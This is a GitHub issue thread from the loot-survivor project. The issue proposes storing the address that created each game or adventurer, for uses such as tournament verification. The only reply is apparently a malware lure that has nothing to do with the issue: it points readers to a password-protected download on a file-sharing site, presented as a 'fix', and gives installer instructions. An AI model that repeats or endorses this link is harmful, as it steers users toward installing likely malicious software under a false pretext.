### ISSUE TITLE
store the address that created the game/adventurer

### ISSUE THREAD

**Issue by loothero** [Provable-Games/loot-survivor#191]
I can think of a lot of use cases for this. Simple/basic version is for tournament verification so that they can verify the game was created by the tournament contract. Tons of other use cases though and simple add

**Comment by masooddahmedd** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
